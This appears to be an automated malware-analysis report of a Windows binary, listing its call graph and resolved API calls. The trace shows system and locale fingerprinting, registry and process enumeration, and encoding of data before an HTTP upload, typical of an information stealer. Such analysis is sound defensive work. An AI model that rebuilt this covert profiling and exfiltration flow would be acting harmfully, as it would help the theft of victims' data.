4 API calls 46179->46180 46181 411f74 46180->46181 46182 41abb0 lstrcpy 46181->46182 46183 411f7d 46182->46183 46184 41acc0 4 API calls 46183->46184 46185 411f9c 46184->46185 46186 41abb0 lstrcpy 46185->46186 46187 411fa5 46186->46187 46188 41acc0 4 API calls 46187->46188 46189 411fc5 46188->46189 46190 41abb0 lstrcpy 46189->46190 46191 411fce 46190->46191 46192 417a70 3 API calls 46191->46192 46193 411fde 46192->46193 46194 41acc0 4 API calls 46193->46194 46195 411fee 46194->46195 46196 41abb0 lstrcpy 46195->46196 46197 411ff7 46196->46197 46198 41acc0 4 API calls 46197->46198 46199 412016 46198->46199 46200 41abb0 lstrcpy 46199->46200 46201 41201f 46200->46201 46202 41acc0 4 API calls 46201->46202 46203 412040 46202->46203 46204 41abb0 lstrcpy 46203->46204 46205 412049 46204->46205 46518 417b10 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 46205->46518 46208 41acc0 4 API calls 46209 412069 46208->46209 46210 41abb0 lstrcpy 46209->46210 46211 412072 46210->46211 46212 41acc0 4 API calls 46211->46212 46213 412091 46212->46213 46214 41abb0 lstrcpy 46213->46214 46215 41209a 46214->46215 46216 41acc0 4 API calls 46215->46216 46217 4120bb 46216->46217 46218 41abb0 lstrcpy 46217->46218 46219 4120c4 46218->46219 46520 417bc0 GetProcessHeap HeapAlloc GetTimeZoneInformation 46219->46520 46222 41acc0 4 API calls 46223 4120e4 46222->46223 46224 41abb0 lstrcpy 46223->46224 46225 4120ed 46224->46225 46226 41acc0 4 API calls 46225->46226 46227 41210c 46226->46227 46228 41abb0 lstrcpy 46227->46228 46229 412115 46228->46229 46230 41acc0 4 API calls 46229->46230 46231 412135 46230->46231 46232 41abb0 lstrcpy 46231->46232 46233 41213e 46232->46233 46523 417c90 GetUserDefaultLocaleName 46233->46523 46236 41acc0 4 API calls 46237 41215e 46236->46237 46238 41abb0 lstrcpy 46237->46238 46239 412167 46238->46239 46240 41acc0 4 API calls 46239->46240 46241 412186 46240->46241 46242 41abb0 lstrcpy 46241->46242 46243 41218f 46242->46243 46244 41acc0 4 API calls 46243->46244 46245 4121b0 46244->46245 46246 41abb0 lstrcpy 46245->46246 46247 4121b9 46246->46247 46528 417d20 46247->46528 46249 4121d0 46250 41ac30 3 API calls 46249->46250 46251 4121e3 46250->46251 46252 41abb0 lstrcpy 46251->46252 46253 4121ec 46252->46253 46254 41acc0 4 API calls 46253->46254 46255 412216 46254->46255 46256 41abb0 lstrcpy 46255->46256 46257 41221f 46256->46257 46258 41acc0 4 API calls 46257->46258 46259 41223f 46258->46259 46260 41abb0 lstrcpy 46259->46260 46261 412248 46260->46261 46540 417f10 GetSystemPowerStatus 46261->46540 46264 41acc0 4 API calls 46265 412268 46264->46265 46266 41abb0 lstrcpy 46265->46266 46267 412271 46266->46267 46268 41acc0 4 API calls 46267->46268 46269 412290 46268->46269 46270 41abb0 lstrcpy 46269->46270 46271 412299 46270->46271 46272 41acc0 4 API calls 46271->46272 46273 4122ba 46272->46273 46274 41abb0 lstrcpy 46273->46274 46275 4122c3 46274->46275 46276 4122ce GetCurrentProcessId 46275->46276 46542 419600 OpenProcess 46276->46542 46279 41ac30 3 API calls 46280 4122f4 46279->46280 46281 41abb0 lstrcpy 46280->46281 46282 4122fd 46281->46282 46283 41acc0 4 API calls 46282->46283 46284 412327 46283->46284 46285 41abb0 lstrcpy 46284->46285 46286 412330 46285->46286 46287 41acc0 4 API calls 46286->46287 46288 412350 46287->46288 46289 41abb0 lstrcpy 46288->46289 46290 412359 46289->46290 46547 417f90 GetProcessHeap HeapAlloc RegOpenKeyExA 46290->46547 46293 41acc0 4 API calls 46294 412379 46293->46294 46295 41abb0 lstrcpy 46294->46295 46296 412382 46295->46296 46297 41acc0 4 API calls 46296->46297 46298 4123a1 46297->46298 46299 41abb0 lstrcpy 46298->46299 46300 4123aa 46299->46300 46301 41acc0 4 API calls 46300->46301 46302 4123cb 46301->46302 46303 41abb0 lstrcpy 46302->46303 46304 4123d4 46303->46304 46551 4180f0 46304->46551 46307 41acc0 4 API calls 46308 4123f4 46307->46308 46309 41abb0 lstrcpy 46308->46309 46310 4123fd 46309->46310 46311 41acc0 4 API calls 46310->46311 46312 41241c 46311->46312 46313 41abb0 lstrcpy 46312->46313 46314 412425 46313->46314 46315 41acc0 4 API calls 46314->46315 46316 412446 46315->46316 46317 41abb0 lstrcpy 46316->46317 46318 41244f 46317->46318 46566 418060 GetSystemInfo wsprintfA 46318->46566 46321 41acc0 4 API calls 46322 41246f 46321->46322 46323 41abb0 lstrcpy 46322->46323 46324 412478 46323->46324 46325 41acc0 4 API calls 46324->46325 46326 412497 46325->46326 46327 41abb0 lstrcpy 46326->46327 46328 4124a0 46327->46328 46329 41acc0 4 API calls 46328->46329 46330 4124c0 46329->46330 46331 41abb0 lstrcpy 46330->46331 46332 4124c9 46331->46332 46568 418290 GetProcessHeap HeapAlloc 46332->46568 46335 41acc0 4 API calls 46336 4124e9 46335->46336 46337 41abb0 lstrcpy 46336->46337 46338 4124f2 46337->46338 46339 41acc0 4 API calls 46338->46339 46340 412511 46339->46340 46341 41abb0 lstrcpy 46340->46341 46342 41251a 46341->46342 46343 41acc0 4 API calls 46342->46343 46344 41253b 46343->46344 46345 41abb0 lstrcpy 46344->46345 46346 412544 46345->46346 46574 418950 46346->46574 46349 41ac30 3 API calls 46350 41256e 46349->46350 46351 41abb0 lstrcpy 46350->46351 46352 412577 46351->46352 46353 41acc0 4 API calls 46352->46353 46354 4125a1 46353->46354 46355 41abb0 lstrcpy 46354->46355 46356 4125aa 46355->46356 46357 41acc0 4 API calls 46356->46357 46358 4125ca 46357->46358 46359 41abb0 lstrcpy 46358->46359 46360 4125d3 46359->46360 46361 41acc0 4 API calls 46360->46361 46362 4125f2 46361->46362 46363 41abb0 lstrcpy 46362->46363 46364 4125fb 46363->46364 46579 418380 46364->46579 46366 412612 46367 41ac30 3 API calls 46366->46367 46368 412625 46367->46368 46369 41abb0 lstrcpy 46368->46369 46370 41262e 46369->46370 46371 41acc0 4 API calls 46370->46371 46372 41265a 46371->46372 46373 41abb0 lstrcpy 46372->46373 46374 412663 46373->46374 46375 41acc0 4 API calls 46374->46375 46376 412682 46375->46376 46377 41abb0 lstrcpy 46376->46377 46378 41268b 46377->46378 46379 41acc0 4 API calls 46378->46379 46380 4126ac 46379->46380 46381 41abb0 lstrcpy 46380->46381 46382 4126b5 46381->46382 46383 41acc0 4 API calls 46382->46383 46384 4126d4 46383->46384 46385 41abb0 lstrcpy 46384->46385 46386 4126dd 46385->46386 46387 41acc0 4 API calls 46386->46387 46388 4126fe 46387->46388 46389 41abb0 lstrcpy 46388->46389 46390 412707 46389->46390 46587 4184b0 46390->46587 46392 412723 46393 41ac30 3 API calls 46392->46393 46394 412736 46393->46394 46395 41abb0 lstrcpy 46394->46395 46396 41273f 46395->46396 46397 41acc0 4 API calls 46396->46397 46398 412769 46397->46398 46399 41abb0 lstrcpy 46398->46399 46400 412772 46399->46400 46401 41acc0 4 API calls 46400->46401 46402 412793 46401->46402 46403 41abb0 lstrcpy 46402->46403 46404 41279c 46403->46404 46405 4184b0 17 API calls 46404->46405 46406 4127b8 46405->46406 46407 41ac30 3 API calls 46406->46407 46408 4127cb 46407->46408 46409 41abb0 lstrcpy 46408->46409 46410 4127d4 46409->46410 46411 41acc0 4 API calls 46410->46411 46412 4127fe 46411->46412 46413 41abb0 lstrcpy 46412->46413 46414 412807 46413->46414 46415 41acc0 4 API calls 46414->46415 46416 412826 46415->46416 46417 41abb0 lstrcpy 46416->46417 46418 41282f 46417->46418 46419 41acc0 4 API calls 46418->46419 46420 412850 46419->46420 46421 41abb0 lstrcpy 46420->46421 46422 412859 46421->46422 46623 418810 46422->46623 46424 412870 46425 41ac30 3 API calls 46424->46425 46426 412883 46425->46426 46427 41abb0 lstrcpy 46426->46427 46428 41288c 46427->46428 46429 4128aa lstrlenA 46428->46429 46430 4128ba 46429->46430 46431 41aa50 lstrcpy 46430->46431 46432 4128cc 46431->46432 46433 401590 lstrcpy 46432->46433 46434 4128dd 46433->46434 46633 4153e0 46434->46633 46436 4128e9 46436->44852 46830 41ade0 46437->46830 46439 405059 InternetOpenUrlA 46444 405071 46439->46444 46440 4050f0 InternetCloseHandle InternetCloseHandle 46442 40513c 46440->46442 46441 40507a InternetReadFile 46441->46444 46442->44856 46443 4050c0 KiUserExceptionDispatcher 46443->46444 46444->46440 46444->46441 46444->46443 46445->44860 46446->44868 46447->44872 46448->44890 46449->44889 46450->44889 46465 41aab0 lstrcpy 46464->46465 46466 4016c3 46465->46466 46467 41aab0 lstrcpy 46466->46467 46468 4016d5 46467->46468 46469 41aab0 lstrcpy 46468->46469 46470 4016e7 46469->46470 46471 41aab0 lstrcpy 46470->46471 46472 4015a3 46471->46472 46472->45682 46494 401030 46473->46494 46477 404888 lstrlenA 46497 41ade0 46477->46497 46479 404898 InternetCrackUrlA 46480 4048b7 46479->46480 46480->45759 46482 40a249 LocalAlloc 46481->46482 46483 404f3e 46481->46483 46482->46483 46484 40a264 CryptStringToBinaryA 46482->46484 46483->45781 46483->45783 46484->46483 46485 40a289 LocalFree 46484->46485 46485->46483 46486->45775 46489 41ac41 46487->46489 46488 41ac98 46490 41aab0 lstrcpy 46488->46490 46489->46488 46491 41ac78 lstrcpy lstrcatA 46489->46491 46492 41aca4 46490->46492 46491->46488 46492->45778 46493->45893 46495 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 46494->46495 46496 41ade0 46495->46496 46496->46477 46497->46479 46498->45903 46499->45941 46500->46049 46501->46051 46502->46053 46503->46055 46504->46059 46505->46061 46506->46070 46507->46077 46508->46087 46640 417930 46509->46640 46512 417856 RegOpenKeyExA 46514 417894 RegCloseKey 46512->46514 46515 417877 RegQueryValueExA 46512->46515 46513 411e6e 46513->46152 46514->46513 46515->46514 46517 411ee9 46516->46517 46517->46166 46519 412059 46518->46519 46519->46208 46521 4120d4 46520->46521 46522 417c2a wsprintfA 46520->46522 46521->46222 46522->46521 46524 41214e 46523->46524 46525 417cdd 46523->46525 46524->46236 46647 418eb0 LocalAlloc CharToOemW 46525->46647 46527 417ce9 46527->46524 46529 41aa50 lstrcpy 46528->46529 46530 417d5c GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 46529->46530 46537 417db5 46530->46537 46531 417dd6 GetLocaleInfoA 46531->46537 46532 417ea8 46533 417eb8 46532->46533 46534 417eae LocalFree 46532->46534 46536 41aab0 lstrcpy 46533->46536 46534->46533 46535 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 46535->46537 46539 417ec7 46536->46539 46537->46531 46537->46532 46537->46535 46538 41abb0 lstrcpy 46537->46538 46538->46537 46539->46249 46541 412258 46540->46541 46541->46264 46543 419623 K32GetModuleFileNameExA CloseHandle 46542->46543 46544 419645 46542->46544 46543->46544 46545 41aa50 lstrcpy 46544->46545 46546 4122e1 46545->46546 46546->46279 46548 417ff8 RegQueryValueExA 46547->46548 46550 412369 46547->46550 46549 41801e RegCloseKey 46548->46549 46549->46550 46550->46293 46552 418149 GetLogicalProcessorInformationEx 46551->46552 46553 418168 GetLastError 46552->46553 46559 4181b9 46552->46559 46554 418173 46553->46554 46555 4181b2 46553->46555 46556 41817c 46554->46556 46562 4123e4 46555->46562 46651 418b80 GetProcessHeap HeapFree 46555->46651 46556->46552 46564 4181a6 46556->46564 46648 418b80 GetProcessHeap HeapFree 46556->46648 46649 418ba0 GetProcessHeap HeapAlloc 46556->46649 46650 418b80 GetProcessHeap HeapFree 46559->46650 46562->46307 46563 41820b 46563->46562 46565 418214 wsprintfA 46563->46565 46564->46562 46565->46562 46567 41245f 46566->46567 46567->46321 46569 418b40 46568->46569 46570 4182dd GlobalMemoryStatusEx 46569->46570 46571 4182f3 __aulldiv 46570->46571 46572 41832b wsprintfA 46571->46572 46573 4124d9 46572->46573 46573->46335 46575 41898b GetProcessHeap HeapAlloc wsprintfA 46574->46575 46577 41aa50 lstrcpy 46575->46577 46578 41255b 46577->46578 46578->46349 46580 41aa50 lstrcpy 46579->46580 46584 4183b9 46580->46584 46581 4183f3 46583 41aab0 lstrcpy 46581->46583 46582 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 46582->46584 46585 41846c 46583->46585 46584->46581 46584->46582 46586 41abb0 lstrcpy 46584->46586 46585->46366 46586->46584 46588 41aa50 lstrcpy 46587->46588 46589 4184ec RegOpenKeyExA 46588->46589 46590 418560 46589->46590 46591 41853e 46589->46591 46593 4187a3 RegCloseKey 46590->46593 46594 418588 RegEnumKeyExA 46590->46594 46592 41aab0 lstrcpy 46591->46592 46603 41854d 46592->46603 46597 41aab0 lstrcpy 46593->46597 46595 4185cf wsprintfA RegOpenKeyExA 46594->46595 46596 41879e 46594->46596 46598 418651 RegQueryValueExA 46595->46598 46599 418615 RegCloseKey RegCloseKey 46595->46599 46596->46593 46597->46603 46601 418791 RegCloseKey 46598->46601 46602 41868a lstrlenA 46598->46602 46600 41aab0 lstrcpy 46599->46600 46600->46603 46601->46596 46602->46601 46604 4186a0 46602->46604 46603->46392 46605 41acc0 4 API calls 46604->46605 46606 4186b7 46605->46606 46607 41abb0 lstrcpy 46606->46607 46608 4186c3 46607->46608 46609 41acc0 4 API calls 46608->46609 46610 4186e7 46609->46610 46611 41abb0 lstrcpy 46610->46611 46612 4186f3 46611->46612 46613 4186fe RegQueryValueExA 46612->46613 46613->46601 46614 418733 46613->46614 46615 41acc0 4 API calls 46614->46615 46616 41874a 46615->46616 46617 41abb0 lstrcpy 46616->46617 46618 418756 46617->46618 46619 41acc0 4 API calls 46618->46619 46620 41877a 46619->46620 46621 41abb0 lstrcpy 46620->46621 46622 418786 46621->46622 46622->46601 46624 41aa50 lstrcpy 46623->46624 46625 41884c CreateToolhelp32Snapshot Process32First 46624->46625 46626 418878 Process32Next 46625->46626 46627 4188ed CloseHandle 46625->46627 46626->46627 46632 41888d 46626->46632 46628 41aab0 lstrcpy 46627->46628 46629 418906 46628->46629 46629->46424 46630 41abb0 lstrcpy 46630->46632 46631 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 46631->46632 46632->46626 46632->46630 46632->46631 46634 41aab0 lstrcpy 46633->46634 46635 415405 46634->46635 46636 401590 lstrcpy 46635->46636 46637 415416 46636->46637 46652 405150 46637->46652 46639 41541f 46639->46436 46643 4178b0 GetProcessHeap HeapAlloc RegOpenKeyExA 46640->46643 46642 417849 46642->46512 46642->46513 46644 417910 RegCloseKey 46643->46644 46645 4178f5 RegQueryValueExA 46643->46645 46646 417923 46644->46646 46645->46644 46646->46642 46647->46527 46648->46556 46649->46556 46650->46563 46651->46562 46653 41aab0 lstrcpy 46652->46653 46654 405169 46653->46654 46655 404800 5 API calls 46654->46655 46656 405175 46655->46656 46815 419030 46656->46815 46658 4051d4 46659 4051e2 lstrlenA 46658->46659 46660 4051f5 46659->46660 46661 419030 4 API calls 46660->46661 46662 405206 46661->46662 46663 41aa50 lstrcpy 46662->46663 46664 405219 46663->46664 46665 41aa50 lstrcpy 46664->46665 46666 405226 46665->46666 46667 41aa50 lstrcpy 46666->46667 46668 405233 46667->46668 46669 41aa50 lstrcpy 46668->46669 46670 405240 46669->46670 46671 41aa50 lstrcpy 46670->46671 46672 40524d InternetOpenA StrCmpCA 46671->46672 46673 40527f 46672->46673 46674 405290 46673->46674 46675 405914 InternetCloseHandle 46673->46675 46822 418cf0 GetSystemTime lstrcpy lstrcpy 46674->46822 46682 405929 ctype 46675->46682 46677 40529e 46678 41ac30 3 API calls 46677->46678 46679 4052b1 46678->46679 46680 41abb0 lstrcpy 46679->46680 46681 4052ba 46680->46681 46683 41acc0 4 API calls 46681->46683 46685 41aab0 lstrcpy 46682->46685 46684 4052fb 46683->46684 46686 41ac30 3 API calls 46684->46686 46693 405963 46685->46693 46687 405302 46686->46687 46688 41acc0 4 API calls 46687->46688 46689 405309 46688->46689 46690 41abb0 lstrcpy 46689->46690 46691 405312 46690->46691 46692 41acc0 4 API calls 46691->46692 46694 405353 46692->46694 46693->46639 46695 41ac30 3 API calls 46694->46695 46696 40535a 46695->46696 46697 41abb0 lstrcpy 46696->46697 46698 405363 46697->46698 46699 405379 InternetConnectA 46698->46699 46699->46675 46700 4053a9 HttpOpenRequestA 46699->46700 46702 405907 InternetCloseHandle 46700->46702 46703 405407 46700->46703 46702->46675 46704 41acc0 4 API calls 46703->46704 46705 40541b 46704->46705 46706 41abb0 lstrcpy 46705->46706 46707 405424 46706->46707 46708 41ac30 3 API calls 46707->46708 46709 405442 46708->46709 46710 41abb0 lstrcpy 46709->46710 46711 40544b 46710->46711 46712 41acc0 4 API calls 46711->46712 46713 40546a 46712->46713 46714 41abb0 lstrcpy 46713->46714 46715 405473 46714->46715 46716 41acc0 4 API calls 46715->46716 46717 405494 46716->46717 46718 41abb0 lstrcpy 46717->46718 46719 40549d 46718->46719 46720 41acc0 4 API calls 46719->46720 46721 4054be 46720->46721 46722 41abb0 lstrcpy 46721->46722 46723 4054c7 46722->46723 46816 419039 46815->46816 46817 41903d CryptBinaryToStringA 46815->46817 46816->46658 46817->46816 46818 41905e GetProcessHeap HeapAlloc 46817->46818 46819 419080 46818->46819 46820 419084 ctype 46818->46820 46819->46816 46821 419095 CryptBinaryToStringA 46820->46821 46821->46819 46822->46677 46830->46439 46831 2e39f06 46832 2e39f15 46831->46832 46835 2e3a6a6 46832->46835 46836 2e3a6c1 46835->46836 46837 2e3a6ca CreateToolhelp32Snapshot 46836->46837 46838 2e3a6e6 Module32First 46836->46838 46837->46836 46837->46838 46839 2e3a6f5 46838->46839 46841 2e39f1e 46838->46841 46842 2e3a365 46839->46842 46843 2e3a390 46842->46843 46844 2e3a3a1 VirtualAlloc 46843->46844 46845 2e3a3d9 46843->46845 46844->46845 46845->46845

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,02E325E8), ref: 00419F3D
                                      • GetProcAddress.KERNEL32(74DD0000,02E328E8), ref: 00419F55
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1D88), ref: 00419F6E
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1DA0), ref: 00419F86
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1EA8), ref: 00419F9E
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1EC0), ref: 00419FB7
                                      • GetProcAddress.KERNEL32(74DD0000,02E35948), ref: 00419FCF
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1E48), ref: 00419FE7
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1FC8), ref: 0041A000
                                      • GetProcAddress.KERNEL32(74DD0000,02EB2058), ref: 0041A018
                                      • GetProcAddress.KERNEL32(74DD0000,02EB2070), ref: 0041A030
                                      • GetProcAddress.KERNEL32(74DD0000,02E327E8), ref: 0041A049
                                      • GetProcAddress.KERNEL32(74DD0000,02E325C8), ref: 0041A061
                                      • GetProcAddress.KERNEL32(74DD0000,02E32588), ref: 0041A079
                                      • GetProcAddress.KERNEL32(74DD0000,02E326E8), ref: 0041A092
                                      • GetProcAddress.KERNEL32(74DD0000,02EB2088), ref: 0041A0AA
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1FF8), ref: 0041A0C2
                                      • GetProcAddress.KERNEL32(74DD0000,02E35A88), ref: 0041A0DB
                                      • GetProcAddress.KERNEL32(74DD0000,02E325A8), ref: 0041A0F3
                                      • GetProcAddress.KERNEL32(74DD0000,02EB2010), ref: 0041A10B
                                      • GetProcAddress.KERNEL32(74DD0000,02EB2040), ref: 0041A124
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1FE0), ref: 0041A13C
                                      • GetProcAddress.KERNEL32(74DD0000,02EB2028), ref: 0041A154
                                      • GetProcAddress.KERNEL32(74DD0000,02E32748), ref: 0041A16D
                                      • GetProcAddress.KERNEL32(74DD0000,02EB50A8), ref: 0041A185
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4FB8), ref: 0041A19D
                                      • GetProcAddress.KERNEL32(74DD0000,02EB5048), ref: 0041A1B6
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4F28), ref: 0041A1CE
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4E98), ref: 0041A1E6
                                      • GetProcAddress.KERNEL32(74DD0000,02EB5168), ref: 0041A1FF
                                      • GetProcAddress.KERNEL32(74DD0000,02EB50C0), ref: 0041A217
                                      • GetProcAddress.KERNEL32(74DD0000,02EB5060), ref: 0041A22F
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4FE8), ref: 0041A248
                                      • GetProcAddress.KERNEL32(74DD0000,02E34BE0), ref: 0041A260
                                      • GetProcAddress.KERNEL32(74DD0000,02EB5018), ref: 0041A278
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4EB0), ref: 0041A291
                                      • GetProcAddress.KERNEL32(74DD0000,02E32768), ref: 0041A2A9
                                      • GetProcAddress.KERNEL32(74DD0000,02EB5108), ref: 0041A2C1
                                      • GetProcAddress.KERNEL32(74DD0000,02E32788), ref: 0041A2DA
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4FD0), ref: 0041A2F2
                                      • GetProcAddress.KERNEL32(74DD0000,02EB4F40), ref: 0041A30A
                                      • GetProcAddress.KERNEL32(74DD0000,02E327C8), ref: 0041A323
                                      • GetProcAddress.KERNEL32(74DD0000,02E322E8), ref: 0041A33B
                                      • LoadLibraryA.KERNEL32(02EB5090,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                      • LoadLibraryA.KERNEL32(02EB4EC8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                      • LoadLibraryA.KERNEL32(02EB5030,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                      • LoadLibraryA.KERNEL32(02EB5000,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                      • LoadLibraryA.KERNEL32(02EB5078,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                      • LoadLibraryA.KERNEL32(02EB4FA0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                      • LoadLibraryA.KERNEL32(02EB50D8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                      • LoadLibraryA.KERNEL32(02EB50F0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                      • GetProcAddress.KERNEL32(75290000,02E32388), ref: 0041A3EA
                                      • GetProcAddress.KERNEL32(75290000,02EB5120), ref: 0041A402
                                      • GetProcAddress.KERNEL32(75290000,02EB20F0), ref: 0041A41A
                                      • GetProcAddress.KERNEL32(75290000,02EB5138), ref: 0041A433
                                      • GetProcAddress.KERNEL32(75290000,02E324A8), ref: 0041A44B
                                      • GetProcAddress.KERNEL32(73440000,02E35768), ref: 0041A470
                                      • GetProcAddress.KERNEL32(73440000,02E32228), ref: 0041A489
                                      • GetProcAddress.KERNEL32(73440000,02E357E0), ref: 0041A4A1
                                      • GetProcAddress.KERNEL32(73440000,02EB5150), ref: 0041A4B9
                                      • GetProcAddress.KERNEL32(73440000,02EB4E80), ref: 0041A4D2
                                      • GetProcAddress.KERNEL32(73440000,02E321E8), ref: 0041A4EA
                                      • GetProcAddress.KERNEL32(73440000,02E321C8), ref: 0041A502
                                      • GetProcAddress.KERNEL32(73440000,02EB4EF8), ref: 0041A51B
                                      • GetProcAddress.KERNEL32(752C0000,02E32208), ref: 0041A53C
                                      • GetProcAddress.KERNEL32(752C0000,02E323E8), ref: 0041A554
                                      • GetProcAddress.KERNEL32(752C0000,02EB4EE0), ref: 0041A56D
                                      • GetProcAddress.KERNEL32(752C0000,02EB4F10), ref: 0041A585
                                      • GetProcAddress.KERNEL32(752C0000,02E32168), ref: 0041A59D
                                      • GetProcAddress.KERNEL32(74EC0000,02E35B50), ref: 0041A5C3
                                      • GetProcAddress.KERNEL32(74EC0000,02E35B00), ref: 0041A5DB
                                      • GetProcAddress.KERNEL32(74EC0000,02EB4F58), ref: 0041A5F3
                                      • GetProcAddress.KERNEL32(74EC0000,02E323A8), ref: 0041A60C
                                      • GetProcAddress.KERNEL32(74EC0000,02E32448), ref: 0041A624
                                      • GetProcAddress.KERNEL32(74EC0000,02E35B28), ref: 0041A63C
                                      • GetProcAddress.KERNEL32(75BD0000,02EB4F70), ref: 0041A662
                                      • GetProcAddress.KERNEL32(75BD0000,02E322C8), ref: 0041A67A
                                      • GetProcAddress.KERNEL32(75BD0000,02EB21E0), ref: 0041A692
                                      • GetProcAddress.KERNEL32(75BD0000,02EB4F88), ref: 0041A6AB
                                      • GetProcAddress.KERNEL32(75BD0000,02EB5198), ref: 0041A6C3
                                      • GetProcAddress.KERNEL32(75BD0000,02E32268), ref: 0041A6DB
                                      • GetProcAddress.KERNEL32(75BD0000,02E322A8), ref: 0041A6F4
                                      • GetProcAddress.KERNEL32(75BD0000,02EB51F8), ref: 0041A70C
                                      • GetProcAddress.KERNEL32(75BD0000,02EB5210), ref: 0041A724
                                      • GetProcAddress.KERNEL32(75A70000,02E32308), ref: 0041A746
                                      • GetProcAddress.KERNEL32(75A70000,02EB51E0), ref: 0041A75E
                                      • GetProcAddress.KERNEL32(75A70000,02EB5228), ref: 0041A776
                                      • GetProcAddress.KERNEL32(75A70000,02EB51B0), ref: 0041A78F
                                      • GetProcAddress.KERNEL32(75A70000,02EB5240), ref: 0041A7A7
                                      • GetProcAddress.KERNEL32(75450000,02E32348), ref: 0041A7C8
                                      • GetProcAddress.KERNEL32(75450000,02E32328), ref: 0041A7E1
                                      • GetProcAddress.KERNEL32(75DA0000,02E32508), ref: 0041A802
                                      • GetProcAddress.KERNEL32(75DA0000,02EB51C8), ref: 0041A81A
                                      • GetProcAddress.KERNEL32(6F080000,02E32528), ref: 0041A840
                                      • GetProcAddress.KERNEL32(6F080000,02E321A8), ref: 0041A858
                                      • GetProcAddress.KERNEL32(6F080000,02E324E8), ref: 0041A870
                                      • GetProcAddress.KERNEL32(6F080000,02EB5180), ref: 0041A889
                                      • GetProcAddress.KERNEL32(6F080000,02E32468), ref: 0041A8A1
                                      • GetProcAddress.KERNEL32(6F080000,02E323C8), ref: 0041A8B9
                                      • GetProcAddress.KERNEL32(6F080000,02E32488), ref: 0041A8D2
                                      • GetProcAddress.KERNEL32(6F080000,02E32248), ref: 0041A8EA
                                      • GetProcAddress.KERNEL32(6F080000,InternetSetOptionA), ref: 0041A901
                                      • GetProcAddress.KERNEL32(6F080000,HttpQueryInfoA), ref: 0041A917
                                      • GetProcAddress.KERNEL32(75AF0000,02EB5390), ref: 0041A939
                                      • GetProcAddress.KERNEL32(75AF0000,02EB21B0), ref: 0041A951
                                      • GetProcAddress.KERNEL32(75AF0000,02EB54F8), ref: 0041A969
                                      • GetProcAddress.KERNEL32(75AF0000,02EB54B0), ref: 0041A982
                                      • GetProcAddress.KERNEL32(75D90000,02E32548), ref: 0041A9A3
                                      • GetProcAddress.KERNEL32(6D100000,02EB5480), ref: 0041A9C4
                                      • GetProcAddress.KERNEL32(6D100000,02E32288), ref: 0041A9DD
                                      • GetProcAddress.KERNEL32(6D100000,02EB5570), ref: 0041A9F5
                                      • GetProcAddress.KERNEL32(6D100000,02EB5420), ref: 0041AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
